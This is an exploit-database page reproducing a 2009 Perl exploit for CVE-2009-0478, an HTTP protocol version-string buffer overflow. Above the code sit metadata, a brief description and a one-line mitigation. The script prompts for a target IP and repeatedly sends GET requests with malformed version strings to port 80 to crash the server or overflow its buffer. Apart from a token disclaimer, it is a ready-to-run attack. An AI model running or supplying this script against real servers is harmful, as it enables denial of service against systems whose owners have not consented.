header-logo
Suggest Exploit
vendor:
N/A
by:
Praveen Dar$hanam
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: N/A
Affected Version From: 9.9
Affected Version To: 10000999
Patch Exists: YES
Related CWE: CVE-2009-0478
CPE: N/A
Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-vid-9c2460a4-f6b1-11dd-94d9-0030843d3802/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-0478/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-0478/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=37418https://www.infosecmatter.com/nessus-plugin-library/?id=40310https://www.infosecmatter.com/nessus-plugin-library/?id=36013https://www.infosecmatter.com/nessus-plugin-library/?id=36702https://www.infosecmatter.com/nessus-plugin-library/?id=35626https://www.infosecmatter.com/nessus-plugin-library/?id=35763https://www.infosecmatter.com/nessus-plugin-library/?id=35620https://www.infosecmatter.com/nessus-plugin-library/?id=63402https://www.infosecmatter.com/nessus-plugin-library/?id=59675https://www.infosecmatter.com/nessus-plugin-library/?id=58897
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

HTTP Protocol Version String Buffer Overflow Vulnerability

A buffer overflow vulnerability exists in the HTTP protocol version string of a vulnerable server. An attacker can exploit this vulnerability by sending a malicious version string to the vulnerable server. This can cause a denial of service or potentially allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Apply the latest security patches and updates to the vulnerable server.
Source

Exploit-DB raw data:

#!usr/bin/perl -w

########################################################################################
#
#    Reference:
#    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0478
#     https://www.securityfocus.com/bid/33604/discuss
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
#         Visit:        http://www.evilfingers.com/
#        Author:    Praveen Dar$hanam
#        Email:     praveen[underscore]recker[at]sify.com\
#        Blog:      http://www.darshanams.blogspot.com/
#        Date:      09th February, 2009
#
############Special thanx2 Joshua Morin, Mikko Varpiola, and Jukka Taimisto ############
########################################################################################
######Thanx to str0ke,milw0rm, @rp m@n,security folks and all INDIAN H@CKER$############
########################################################################################


use IO::Socket;

print("\nEnter IP Address of Vulnerable Server: \n");
$vuln_server_ip = <STDIN>;
chomp($vuln_server_ip);

@malicious_version=("9.9","%.%","%%","#.#","\$.\$","*.*","975.975","10000999");

foreach $mal (@malicious_version)
{
   $sock_http = IO::Socket::INET->new(  PeerAddr => $vuln_server_ip,
                                     PeerPort => 80,
                                     Proto    => 'tcp') || "Unable to connect to HTTP Server";

   $http_attack = "GET / HTTP/$mal\r\n".
   "Host: $vuln_server_ip\r\n".
   "Keep-Alive: 300\r\n".
   "Connection: keep-alive\r\n\r\n";

   print $sock_http $http_attack;
   sleep(3);

   close($sock_http);
}

# milw0rm.com [2009-02-09]

Navigation

Suggest Exploit

Services By CQR